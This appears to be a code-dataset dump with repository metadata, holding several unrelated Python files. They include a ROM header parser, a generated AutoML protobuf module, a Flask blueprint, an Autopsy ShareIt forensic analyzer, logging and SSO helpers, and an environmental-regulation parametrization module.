props["rom_size"] = mastersystem_romsize.get(header[0x0f] & 0x0f, "")
# SDSC (homebrew) header. See isValidData()
if data[0x7fe0 : 0x7fe0 + 4] == b"SDSC" and len(data) > 0x7fe0 + 0x10:
sdsc = data[0x7fe0 : 0x7fe0 + 0x10]
# 7FE0-7FE3 - Magic word "SDSC", this is used to show that the header is present
# 7FE4-7FE5 - Version, major-dot-minor in BCD. Thus, 0x1046 is 10.46. Note,
# this version tag will override the SMS header tag (probably
# as the author intended).
props["version"] = "%X.%02X" % (sdsc[0x04], sdsc[0x05])
# 7FE6-7FE9 - Release/compilation date, in day, month, year (little endian, all BCD)
props["date"] = "%02X%02X-%02X-%02X" % (sdsc[0x09], sdsc[0x08], sdsc[0x07], sdsc[0x06])
# 7FEA-7FEB - Author pointer, the ROM address of a zero-terminated
# author name. 0xFFFF and 0x0000 indicate no author name.
props["author"] = self.get_cstr(sdsc[0x0a] << 8 | sdsc[0x0b], data)
# 7FEC-7FED - Name pointer, the ROM address of a zero-terminated program
# name. 0xFFFF indicates no program name (but I ignore 0 also).
props["title"] = self.get_cstr(sdsc[0x0c] << 8 | sdsc[0x0d], data)
# 7FEE-7FEF - Description pointer, the ROM address of a zero-terminated
# description. 0xFFFF indicates no program name (but I ignore
# 0x0000 also). Can include CR, CRLF and LF line breaks.
props["description"] = self.get_cstr(sdsc[0x0e] << 8 | sdsc[0x0f], data)
else:
# No update to version property
props["date"] = ""
props["author"] = ""
props["title"] = ""
props["description"] = ""
return props
def get_cstr(self, ptr, data):
"""
Parse a zero-terminated (c-style) string from a bytearray. 0xFFFF and
0x0000 are invalid ptr values and will return "".
"""
if ptr != 0xffff and ptr != 0 and ptr < len(data):
term = ptr
while term < len(data) and data[term]:
term += 1
return self._sanitize(data[ptr : term])
return ""
RomInfoParser.registerParser(MasterSystemParser())
mastersystem_romsize = {
0xa: "8 KB",
0xb: "16 KB",
0xc: "32 KB",
0xd: "48 KB",
0xe: "64 KB",
0xf: "128 KB",
0x0: "256 KB",
0x1: "512 KB",
0x2: "1024 KB",
}
| 46.04375 | 116 | 0.584906 |
828b2e9c74b31ec0e739163d1f6cad6f23cb669c | 5,596 | py | Python | google/cloud/automl_v1/proto/annotation_spec_pb2.py | busunkim96/python-automl | 7df905910b86721a6ee3a3b6c916a4f8e27d0aa7 | [
"Apache-2.0"
] | null | null | null | google/cloud/automl_v1/proto/annotation_spec_pb2.py | busunkim96/python-automl | 7df905910b86721a6ee3a3b6c916a4f8e27d0aa7 | [
"Apache-2.0"
] | null | null | null | google/cloud/automl_v1/proto/annotation_spec_pb2.py | busunkim96/python-automl | 7df905910b86721a6ee3a3b6c916a4f8e27d0aa7 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/automl_v1/proto/annotation_spec.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/cloud/automl_v1/proto/annotation_spec.proto",
package="google.cloud.automl.v1",
syntax="proto3",
serialized_options=b"\n\032com.google.cloud.automl.v1P\001Z<google.golang.org/genproto/googleapis/cloud/automl/v1;automl\252\002\026Google.Cloud.AutoML.V1\312\002\026Google\\Cloud\\AutoMl\\V1\352\002\031Google::Cloud::AutoML::V1",
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n2google/cloud/automl_v1/proto/annotation_spec.proto\x12\x16google.cloud.automl.v1\x1a\x19google/api/resource.proto\x1a\x1cgoogle/api/annotations.proto"\xd6\x01\n\x0e\x41nnotationSpec\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x14\n\x0c\x64isplay_name\x18\x02 \x01(\t\x12\x15\n\rexample_count\x18\t \x01(\x05:\x88\x01\xea\x41\x84\x01\n$automl.googleapis.com/AnnotationSpec\x12\\projects/{project}/locations/{location}/datasets/{dataset}/annotationSpecs/{annotation_spec}B\xaa\x01\n\x1a\x63om.google.cloud.automl.v1P\x01Z<google.golang.org/genproto/googleapis/cloud/automl/v1;automl\xaa\x02\x16Google.Cloud.AutoML.V1\xca\x02\x16Google\\Cloud\\AutoMl\\V1\xea\x02\x19Google::Cloud::AutoML::V1b\x06proto3',
dependencies=[
google_dot_api_dot_resource__pb2.DESCRIPTOR,
google_dot_api_dot_annotations__pb2.DESCRIPTOR,
],
)
_ANNOTATIONSPEC = _descriptor.Descriptor(
name="AnnotationSpec",
full_name="google.cloud.automl.v1.AnnotationSpec",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.cloud.automl.v1.AnnotationSpec.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="display_name",
full_name="google.cloud.automl.v1.AnnotationSpec.display_name",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="example_count",
full_name="google.cloud.automl.v1.AnnotationSpec.example_count",
index=2,
number=9,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=b"\352A\204\001\n$automl.googleapis.com/AnnotationSpec\022\\projects/{project}/locations/{location}/datasets/{dataset}/annotationSpecs/{annotation_spec}",
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=136,
serialized_end=350,
)
DESCRIPTOR.message_types_by_name["AnnotationSpec"] = _ANNOTATIONSPEC
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
AnnotationSpec = _reflection.GeneratedProtocolMessageType(
"AnnotationSpec",
(_message.Message,),
{
"DESCRIPTOR": _ANNOTATIONSPEC,
"__module__": "google.cloud.automl_v1.proto.annotation_spec_pb2",
"__doc__": """A definition of an annotation spec.
Attributes:
name:
Output only. Resource name of the annotation spec. Form: ‘pro
jects/{project_id}/locations/{location_id}/datasets/{dataset_i
d}/annotationSpecs/{annotation_spec_id}’
display_name:
Required. The name of the annotation spec to show in the
interface. The name can be up to 32 characters long and must
match the regexp ``[a-zA-Z0-9_]+``.
example_count:
Output only. The number of examples in the parent dataset
labeled by the annotation spec.
""",
# @@protoc_insertion_point(class_scope:google.cloud.automl.v1.AnnotationSpec)
},
)
_sym_db.RegisterMessage(AnnotationSpec)
DESCRIPTOR._options = None
_ANNOTATIONSPEC._options = None
# @@protoc_insertion_point(module_scope)
| 38.861111 | 718 | 0.678163 |
c1f47baa064b6b6582412411fb8b0a59bcab3827 | 176 | py | Python | api/api.py | JaniniRami/Flask-Blueprint-Template | 4c09716890ae1eb6bb5afcd2800a702300fd5bac | [
"MIT"
] | null | null | null | api/api.py | JaniniRami/Flask-Blueprint-Template | 4c09716890ae1eb6bb5afcd2800a702300fd5bac | [
"MIT"
] | null | null | null | api/api.py | JaniniRami/Flask-Blueprint-Template | 4c09716890ae1eb6bb5afcd2800a702300fd5bac | [
"MIT"
] | null | null | null | from flask import Blueprint
from flask import jsonify
api = Blueprint('api', __name__)
@api.route('/api/ping')
def ping():
return jsonify({'response' : 'pong!'})
| 19.555556 | 43 | 0.659091 |
dc9c549f23c0cf57d67018fc2db7425c76bf3236 | 7,069 | py | Python | InternalPythonModules/android/shareit.py | ljmf00/autopsy | 34a980b7fc7ea47287e7101f5bba6cb1b518bc7b | [
"Apache-2.0"
] | 13 | 2020-11-16T12:30:48.000Z | 2021-02-10T15:00:14.000Z | InternalPythonModules/android/shareit.py | ljmf00/autopsy | 34a980b7fc7ea47287e7101f5bba6cb1b518bc7b | [
"Apache-2.0"
] | 1 | 2019-12-05T14:10:20.000Z | 2019-12-05T14:10:20.000Z | InternalPythonModules/android/shareit.py | ljmf00/autopsy | 34a980b7fc7ea47287e7101f5bba6cb1b518bc7b | [
"Apache-2.0"
] | 5 | 2019-10-08T04:48:19.000Z | 2019-11-22T04:29:12.000Z | """
Autopsy Forensic Browser
Copyright 2019-2020 Basis Technology Corp.
Contact: carrier <at> sleuthkit <dot> org
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from java.io import File
from java.lang import Class
from java.lang import ClassNotFoundException
from java.lang import Long
from java.lang import String
from java.sql import ResultSet
from java.sql import SQLException
from java.sql import Statement
from java.util.logging import Level
from java.util import ArrayList
from org.apache.commons.codec.binary import Base64
from org.sleuthkit.autopsy.casemodule import Case
from org.sleuthkit.autopsy.casemodule import NoCurrentCaseException
from org.sleuthkit.autopsy.coreutils import Logger
from org.sleuthkit.autopsy.coreutils import MessageNotifyUtil
from org.sleuthkit.autopsy.coreutils import AppSQLiteDB
from org.sleuthkit.autopsy.datamodel import ContentUtils
from org.sleuthkit.autopsy.ingest import IngestJobContext
from org.sleuthkit.datamodel import AbstractFile
from org.sleuthkit.datamodel import BlackboardArtifact
from org.sleuthkit.datamodel import BlackboardAttribute
from org.sleuthkit.datamodel import Content
from org.sleuthkit.datamodel import TskCoreException
from org.sleuthkit.datamodel.Blackboard import BlackboardException
from org.sleuthkit.datamodel import Account
from org.sleuthkit.datamodel.blackboardutils import CommunicationArtifactsHelper
from org.sleuthkit.datamodel.blackboardutils.attributes import MessageAttachments
from org.sleuthkit.datamodel.blackboardutils.attributes.MessageAttachments import FileAttachment
from org.sleuthkit.datamodel.blackboardutils.CommunicationArtifactsHelper import MessageReadStatus
from org.sleuthkit.datamodel.blackboardutils.CommunicationArtifactsHelper import CommunicationDirection
import traceback
import general
"""
Finds the SQLite DB for ShareIt, parses the DB for contacts & messages,
and adds artifacts to the case.
"""
class ShareItAnalyzer(general.AndroidComponentAnalyzer):
"""
ShareIt is a file transfer utility app.
This module finds the SQLite DB for Xender, parses the DB for contacts & messages,
and adds artifacts to the case.
ShareIt version 5.0.28 has the following database structure:
- history.db
-- A history table, with records of file transfers
-- An item table with details of the files transfered
"""
def __init__(self):
self._logger = Logger.getLogger(self.__class__.__name__)
self._PACKAGE_NAME = "com.lenovo.anyshare.gps"
self._MODULE_NAME = "ShareIt Analyzer"
self._MESSAGE_TYPE = "ShareIt Message"
self._VERSION = "5.0.28_ww"
def analyze(self, dataSource, fileManager, context):
historyDbs = AppSQLiteDB.findAppDatabases(dataSource, "history.db", True, self._PACKAGE_NAME)
for historyDb in historyDbs:
try:
current_case = Case.getCurrentCaseThrows()
historyDbHelper = CommunicationArtifactsHelper(current_case.getSleuthkitCase(),
self._MODULE_NAME, historyDb.getDBFile(),
Account.Type.SHAREIT)
queryString = """
SELECT history_type, device_id, device_name, description, timestamp, file_path
FROM history
JOIN item where history.content_id = item.item_id
"""
historyResultSet = historyDb.runQuery(queryString)
if historyResultSet is not None:
while historyResultSet.next():
direction = ""
fromId = None
toId = None
fileAttachments = ArrayList()
if (historyResultSet.getInt("history_type") == 1):
direction = CommunicationDirection.INCOMING
fromId = historyResultSet.getString("device_id")
else:
direction = CommunicationDirection.OUTGOING
toId = historyResultSet.getString("device_id")
timeStamp = historyResultSet.getLong("timestamp") / 1000
messageArtifact = historyDbHelper.addMessage(
self._MESSAGE_TYPE,
direction,
fromId,
toId,
timeStamp,
MessageReadStatus.UNKNOWN,
None, # subject
None, # message text
None ) # thread id
# add the file as attachment
fileAttachments.add(FileAttachment(current_case.getSleuthkitCase(), historyDb.getDBFile().getDataSource(), historyResultSet.getString("file_path")))
messageAttachments = MessageAttachments(fileAttachments, [])
historyDbHelper.addAttachments(messageArtifact, messageAttachments)
except SQLException as ex:
self._logger.log(Level.WARNING, "Error processing query result for ShareIt history.", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
except TskCoreException as ex:
self._logger.log(Level.SEVERE, "Failed to create ShareIt message artifacts.", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
except BlackboardException as ex:
self._logger.log(Level.WARNING, "Failed to post artifacts.", ex)
self._logger.log(Level.WARNING, traceback.format_exc())
except NoCurrentCaseException as ex:
self._logger.log(Level.WARNING, "No case currently open.", ex)
self._logger.log(Level.WARNING, traceback.format_exc())
finally:
historyDb.close()
| 48.751724 | 172 | 0.606592 |
201c3ff46ed39f9d31b9bd6af4988cd2d18f6c06 | 1,342 | py | Python | setup/util/logging.py | JackInTaiwan/ViDB | d658fd4f6a1ad2d7d36bb270fde2a373d3cc965d | [
"MIT"
] | 2 | 2021-05-29T06:57:24.000Z | 2021-06-15T09:13:38.000Z | setup/util/logging.py | JackInTaiwan/ViDB | d658fd4f6a1ad2d7d36bb270fde2a373d3cc965d | [
"MIT"
] | null | null | null | setup/util/logging.py | JackInTaiwan/ViDB | d658fd4f6a1ad2d7d36bb270fde2a373d3cc965d | [
"MIT"
] | null | null | null | import os
import logging
import logging.config
def logging_config(log_dir=None, log_file_path=None):
config = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"standard": {
"format": "[%(asctime)s][%(name)s][%(funcName)s][%(levelname)s] %(message)s"
},
"simple": {
"format": "[%(asctime)s] %(message)s"
},
},
"handlers": {
"terminal": {
"level": "INFO",
"formatter": "standard",
"class": "logging.StreamHandler",
}
},
"loggers": {
},
"root": {
"handlers": ["terminal"],
"level": "INFO",
}
}
if log_dir or log_file_path:
log_file_path = log_file_path or os.path.join(log_dir, "output.log")
if not os.path.exists(os.path.dirname(log_file_path)):
os.makedirs(os.path.dirname(log_file_path))
config["handlers"]["file"] = {
"level": "INFO",
"formatter": "standard",
"class": "logging.FileHandler",
"filename": log_file_path,
"mode": "a+",
}
config["root"]["handlers"].append("file")
logging.config.dictConfig(config)
| 26.313725 | 92 | 0.469449 |
e45d3e79a872ae3aa196646253da1ec27a9062da | 1,512 | py | Python | test/test_content_disposition.py | iEngage/python-sdk | 76cc6ed697d7599ce9af74124c12d33ad5aff419 | [
"Apache-2.0"
] | null | null | null | test/test_content_disposition.py | iEngage/python-sdk | 76cc6ed697d7599ce9af74124c12d33ad5aff419 | [
"Apache-2.0"
] | null | null | null | test/test_content_disposition.py | iEngage/python-sdk | 76cc6ed697d7599ce9af74124c12d33ad5aff419 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
iEngage 2.0 API
This API enables Intelligent Engagement for your Business. iEngage is a platform that combines process, augmented intelligence and rewards to help you intelligently engage customers.
OpenAPI spec version: 2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import os
import sys
import unittest
import iengage_client
from iengage_client.rest import ApiException
from iengage_client.models.content_disposition import ContentDisposition
class TestContentDisposition(unittest.TestCase):
""" ContentDisposition unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testContentDisposition(self):
"""
Test ContentDisposition
"""
model = iengage_client.models.content_disposition.ContentDisposition()
if __name__ == '__main__':
unittest.main()
| 28 | 186 | 0.734127 |
6cacb5e7e9fa029588bd6a246876de5b05639229 | 1,214 | py | Python | st2auth/st2auth/sso/noop.py | kkkanil/st2 | 07cd195d7a6e177a37dd019e5c9ab8329259d0fa | [
"Apache-2.0"
] | null | null | null | st2auth/st2auth/sso/noop.py | kkkanil/st2 | 07cd195d7a6e177a37dd019e5c9ab8329259d0fa | [
"Apache-2.0"
] | 15 | 2021-02-11T22:58:54.000Z | 2021-08-06T18:03:47.000Z | st2auth/st2auth/sso/noop.py | kkkanil/st2 | 07cd195d7a6e177a37dd019e5c9ab8329259d0fa | [
"Apache-2.0"
] | 1 | 2021-07-10T15:02:29.000Z | 2021-07-10T15:02:29.000Z | # Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from st2auth.sso.base import BaseSingleSignOnBackend
__all__ = [
'NoOpSingleSignOnBackend'
]
NOT_IMPLEMENTED_MESSAGE = (
'The default "noop" SSO backend is not a proper implementation. '
'Please refer to the enterprise version for configuring SSO.'
)
class NoOpSingleSignOnBackend(BaseSingleSignOnBackend):
"""
NoOp SSO authentication backend.
"""
def get_request_redirect_url(self, referer):
raise NotImplementedError(NOT_IMPLEMENTED_MESSAGE)
def verify_response(self, response):
raise NotImplementedError(NOT_IMPLEMENTED_MESSAGE)
| 30.35 | 74 | 0.760297 |
fe74c915ed9225b787129d41b8deeb08929b80b7 | 10,524 | py | Python | envinorma/parametrization/apply_parameter_values.py | Envinorma/envinorma-data | 85c00abc1af9a3b14912229b0789a0d1d5ae7b69 | [
"MIT"
] | 4 | 2020-12-11T09:40:12.000Z | 2022-03-08T13:43:35.000Z | envinorma/parametrization/apply_parameter_values.py | Envinorma/envinorma-data | 85c00abc1af9a3b14912229b0789a0d1d5ae7b69 | [
"MIT"
] | 104 | 2020-12-10T15:20:13.000Z | 2021-09-30T13:05:00.000Z | envinorma/parametrization/apply_parameter_values.py | Envinorma/envinorma-data | 85c00abc1af9a3b14912229b0789a0d1d5ae7b69 | [
"MIT"
] | null | null | null | from copy import copy
from dataclasses import dataclass, replace
from typing import Any, Dict, List, Optional, Tuple, Union
from envinorma.models import ArreteMinisteriel, Regime
from envinorma.models.arrete_ministeriel import AMApplicability
from envinorma.models.condition import AndCondition, Condition, Greater, Littler, OrCondition, Range
from envinorma.models.parameter import Parameter, ParameterEnum
from envinorma.models.structured_text import (
Applicability,
PotentialInapplicability,
PotentialModification,
SectionParametrization,
StructuredText,
)
from .models.parametrization import Parametrization
from .natural_language_warnings import (
generate_inactive_warning,
generate_modification_warning,
generate_warning_missing_value,
)
from .tie_parametrization import add_parametrization
def _build_alternative_text(
text: StructuredText, modification: PotentialModification, parameter_values: Dict[Parameter, Any]
) -> StructuredText:
new_text = copy(modification.new_version)
new_text.applicability = Applicability(
modified=True,
warnings=[generate_modification_warning(modification.condition, parameter_values)],
previous_version=text,
)
return new_text
def _has_undefined_parameters(condition: Condition, parameter_values: Dict[Parameter, Any]) -> bool:
for parameter in condition.parameters():
if parameter not in parameter_values:
return True
return False
_SectionParameter = Union[PotentialInapplicability, PotentialModification]
def _compute_warnings(
parameter: _SectionParameter, parameter_values: Dict[Parameter, Any], whole_text: bool
) -> List[str]:
if _has_undefined_parameters(parameter.condition, parameter_values):
modification = isinstance(parameter, PotentialModification)
alineas = None if isinstance(parameter, PotentialModification) else parameter.alineas
return [
generate_warning_missing_value(parameter.condition, parameter_values, alineas, modification, whole_text)
]
return []
def _keep_satisfied_conditions(
inapplicable_sections: List[PotentialInapplicability], parameter_values: Dict[Parameter, Any], whole_text: bool
) -> Tuple[List[PotentialInapplicability], List[str]]:
satisfied: List[PotentialInapplicability] = []
warnings: List[str] = []
for inapplicable_section in inapplicable_sections:
if inapplicable_section.condition.is_satisfied(parameter_values):
satisfied.append(inapplicable_section)
else:
warnings = _compute_warnings(inapplicable_section, parameter_values, whole_text)
return satisfied, warnings
def _keep_satisfied_mofications(
alternative_sections: List[PotentialModification], parameter_values: Dict[Parameter, Any]
) -> Tuple[List[PotentialModification], List[str]]:
satisfied: List[PotentialModification] = []
warnings: List[str] = []
for alt in alternative_sections:
if alt.condition.is_satisfied(parameter_values):
satisfied.append(alt)
else:
warnings = _compute_warnings(alt, parameter_values, False)
return satisfied, warnings
def _deactivate_child_section(section: StructuredText, all_inactive: bool) -> StructuredText:
section = copy(section)
if section.applicability:
section.applicability.active = not all_inactive
else:
section.applicability = Applicability(active=not all_inactive)
section.sections = [_deactivate_child_section(sec, all_inactive) for sec in section.sections]
section.outer_alineas = [replace(al, inactive=True) for al in section.outer_alineas]
return section
def _deactivate_alineas(
text: StructuredText, inapplicability: PotentialInapplicability, parameter_values: Dict[Parameter, Any]
) -> StructuredText:
text = copy(text)
inactive_alineas = inapplicability.alineas
all_inactive = inactive_alineas is None
warning = generate_inactive_warning(
inapplicability.condition, parameter_values, all_alineas=all_inactive, whole_text=False
)
if inactive_alineas is not None:
inactive_alineas_set = set(inactive_alineas)
new_outer_alineas = [replace(al, inactive=i in inactive_alineas_set) for i, al in enumerate(text.outer_alineas)]
else:
new_outer_alineas = [replace(al, inactive=True) for al in text.outer_alineas]
text.applicability = Applicability(active=not all_inactive, warnings=[warning])
if inapplicability.subsections_are_inapplicable:
text.sections = [_deactivate_child_section(section, all_inactive=all_inactive) for section in text.sections]
text.outer_alineas = new_outer_alineas
return text
def _apply_satisfied_modificators(
text: StructuredText,
inapplicabilities: List[PotentialInapplicability],
modifications: List[PotentialModification],
parameter_values: Dict[Parameter, Any],
) -> StructuredText:
if inapplicabilities and modifications:
raise NotImplementedError(
f'Cannot handle inapplicability and modification on one section. (Section title: {text.title.text})\n'
f'Inapplicability condition: {inapplicabilities[0].condition}\n'
f'Modification condition: {modifications[0].condition}\n'
)
if modifications:
if len(modifications) > 1:
raise ValueError(
f'Cannot handle more than 1 applicable modification on one section. '
f'Here, {len(modifications)} are applicable.'
)
return _build_alternative_text(text, modifications[0], parameter_values)
if inapplicabilities:
if len(inapplicabilities) > 1:
raise ValueError(
f'Cannot handle more than 1 non-applicability conditions on one section. '
f'Here, {len(inapplicabilities)} conditions are applicable.'
f'\n{parameter_values}\n{text}'
)
return _deactivate_alineas(text, inapplicabilities[0], parameter_values)
return text
def _ensure_applicabiliy(candidate: Any) -> Applicability:
if not isinstance(candidate, Applicability):
raise ValueError(f'Unexpected type {type(candidate)}')
return candidate
def _extract_satisfied_objects_and_warnings(
parametrization: SectionParametrization, parameter_values: Dict[Parameter, Any]
) -> Tuple[List[PotentialInapplicability], List[PotentialModification], List[str]]:
na_conditions, warnings_1 = _keep_satisfied_conditions(
parametrization.potential_inapplicabilities, parameter_values, whole_text=False
)
alternative_sections, warnings_2 = _keep_satisfied_mofications(
parametrization.potential_modifications, parameter_values
)
all_warnings = warnings_1 + warnings_2 + parametrization.warnings
return na_conditions, alternative_sections, sorted(all_warnings)
def _apply_parameter_values_in_text(text: StructuredText, parameter_values: Dict[Parameter, Any]) -> StructuredText:
na_conditions, modifications, warnings = _extract_satisfied_objects_and_warnings(
text.parametrization, parameter_values
)
text = copy(text)
if not na_conditions and not modifications:
text.sections = [_apply_parameter_values_in_text(section, parameter_values) for section in text.sections]
text.applicability = Applicability()
else:
text = _apply_satisfied_modificators(text, na_conditions, modifications, parameter_values)
all_warnings = sorted(set(_ensure_applicabiliy(text.applicability).warnings + warnings))
text.applicability = replace(_ensure_applicabiliy(text.applicability), warnings=all_warnings)
return text
def _generate_whole_text_reason_inactive(condition: Condition, parameter_values: Dict[Parameter, Any]) -> str:
return generate_inactive_warning(condition, parameter_values, True, True)
def _compute_whole_text_applicability(
applicability: AMApplicability, parameter_values: Dict[Parameter, Any]
) -> Tuple[bool, List[str]]:
condition = applicability.condition_of_inapplicability
if not condition:
return True, applicability.warnings
if condition.is_satisfied(parameter_values):
return False, [_generate_whole_text_reason_inactive(condition, parameter_values)]
warnings = applicability.warnings
if _has_undefined_parameters(condition, parameter_values):
warnings.append(generate_warning_missing_value(condition, parameter_values, None, False, True))
return True, warnings
def _is_satisfiable(condition: Condition, regime_target: Regime) -> bool:
if isinstance(condition, AndCondition):
return all([_is_satisfiable(cd, regime_target) for cd in condition.conditions])
if isinstance(condition, OrCondition):
return any([_is_satisfiable(cd, regime_target) for cd in condition.conditions])
if condition.parameter != ParameterEnum.REGIME.value:
return True
if isinstance(condition, (Range, Littler, Greater)):
raise ValueError('Cannot have Range, Littler or Greater condition for Regime parameter.')
return regime_target == condition.target
def apply_parameter_values_to_am(
am: ArreteMinisteriel, parameter_values: Dict[Parameter, Any], parametrization: Optional[Parametrization] = None
) -> ArreteMinisteriel:
if parametrization:
add_parametrization(am, parametrization)
am = copy(am)
am.sections = [_apply_parameter_values_in_text(section, parameter_values) for section in am.sections]
return am
@dataclass
class AMWithApplicability:
arrete: ArreteMinisteriel
applicable: bool
warnings: List[str]
@classmethod
def from_dict(cls, dict_: Dict[str, Any]) -> 'AMWithApplicability':
return cls(
arrete=ArreteMinisteriel.from_dict(dict_['am']), applicable=dict_['applicable'], warnings=dict_['warnings']
)
def to_dict(self) -> Dict[str, Any]:
return {'am': self.arrete.to_dict(), 'applicable': self.applicable, 'warnings': self.warnings}
def build_am_with_applicability(
am: ArreteMinisteriel, parametrization: Optional[Parametrization], parameter_values: Dict[Parameter, Any]
) -> AMWithApplicability:
if parametrization:
add_parametrization(am, parametrization)
applicable, warnings = _compute_whole_text_applicability(am.applicability, parameter_values)
return AMWithApplicability(
arrete=apply_parameter_values_to_am(am, parameter_values), applicable=applicable, warnings=warnings
)
| 42.26506 | 120 | 0.750665 |
5f3ca9e85131975ec8930565d53fdc7fefca8a20 | 463 | py | Python | attributes_and_methods/exercise/gym_04/customer.py | BoyanPeychinov/object_oriented_programming | a960721c7c17710bd7b151a9025647e953435962 | [
"MIT"
] | null | null | null | attributes_and_methods/exercise/gym_04/customer.py | BoyanPeychinov/object_oriented_programming | a960721c7c17710bd7b151a9025647e953435962 | [
"MIT"
] | null | null | null | attributes_and_methods/exercise/gym_04/customer.py | BoyanPeychinov/object_oriented_programming | a960721c7c17710bd7b151a9025647e953435962 | [
"MIT"
] | null | null | null | class Customer:
customer_id = 0
def __init__(self, name, address, email):
Customer.customer_id += Customer.get_next_id()
self.name = name
self.address = address
self.email = email
self.id = Customer.customer_id
def __repr__(self):
return f"Customer <{self.id}> {self.name}; Address: {self.address}; Email: {self.email}"
@staticmethod
def get_next_id():
return Customer.customer_id + 1 | 28.9375 | 96 | 0.62851 |
a1b4e3fb9ddeb269f69286ed500a6798491a2380 | 140 | py | Python | examples/get-ip-addresses.py | jkpubsrc/python-module-jk-utils | 6bf97b3dcde7a970c20ca43323e2eb0dda8fbfb3 | [
"Apache-1.1"
] | 1 | 2022-03-31T05:17:59.000Z | 2022-03-31T05:17:59.000Z | examples/get-ip-addresses.py | jkpubsrc/python-module-jk-prettyprintobj | e9af7470abc59458a12282dd96735002a7c0d9dc | [
"Apache-1.1"
] | null | null | null | examples/get-ip-addresses.py | jkpubsrc/python-module-jk-prettyprintobj | e9af7470abc59458a12282dd96735002a7c0d9dc | [
"Apache-1.1"
] | null | null | null | #!/usr/bin/python3
import jk_utils
d = jk_utils.ip.LocalIPAddressDetector(["eth*", "wlan*"])
for x in d.getIPAddresses():
print(x)
| 10 | 57 | 0.671429 |
d076ff5841aa706f44a553b58e7f60d4f8758866 | 855 | py | Python | prj/example/posix-build.py | singhalshubh/echronos | c996f1d2c8af6c6536205eb319c1bf1d4d84569c | [
"MIT"
] | 154 | 2015-08-14T03:28:16.000Z | 2022-03-19T00:06:38.000Z | prj/example/posix-build.py | singhalshubh/echronos | c996f1d2c8af6c6536205eb319c1bf1d4d84569c | [
"MIT"
] | 59 | 2015-08-30T23:17:33.000Z | 2019-06-12T09:20:57.000Z | prj/example/posix-build.py | singhalshubh/echronos | c996f1d2c8af6c6536205eb319c1bf1d4d84569c | [
"MIT"
] | 44 | 2015-09-19T13:02:07.000Z | 2022-03-19T00:14:11.000Z | #
# eChronos Real-Time Operating System
# Copyright (c) 2017, Commonwealth Scientific and Industrial Research
# Organisation (CSIRO) ABN 41 687 119 230.
#
# All rights reserved. CSIRO is willing to grant you a licence to the eChronos
# real-time operating system under the terms of the CSIRO_BSD_MIT license. See
# the file "LICENSE_CSIRO_BSD_MIT.txt" for details.
#
# @TAG(CSIRO_BSD_MIT)
#
from prj import execute, SystemBuildError
def system_build(output_file, modules, include_paths=None):
if include_paths is None:
include_paths = []
inc_path_args = ['-I%s' % i for i in include_paths]
c_files = []
for mod in modules:
c_files.extend(mod.c_files())
if not c_files:
raise SystemBuildError("Zero C files in system definition")
execute(['gcc', '-o', output_file, '-Wall'] + inc_path_args + c_files)
| 28.5 | 78 | 0.712281 |
ce067bc56466c6b97df47514925f0894a5fbc3bf | 474 | py | Python | profiles_api/urls.py | gasparcsn/profiles-rest-api | 8335165dd9c45ebb384674fb84186fc23d9b5015 | [
"MIT"
] | null | null | null | profiles_api/urls.py | gasparcsn/profiles-rest-api | 8335165dd9c45ebb384674fb84186fc23d9b5015 | [
"MIT"
] | null | null | null | profiles_api/urls.py | gasparcsn/profiles-rest-api | 8335165dd9c45ebb384674fb84186fc23d9b5015 | [
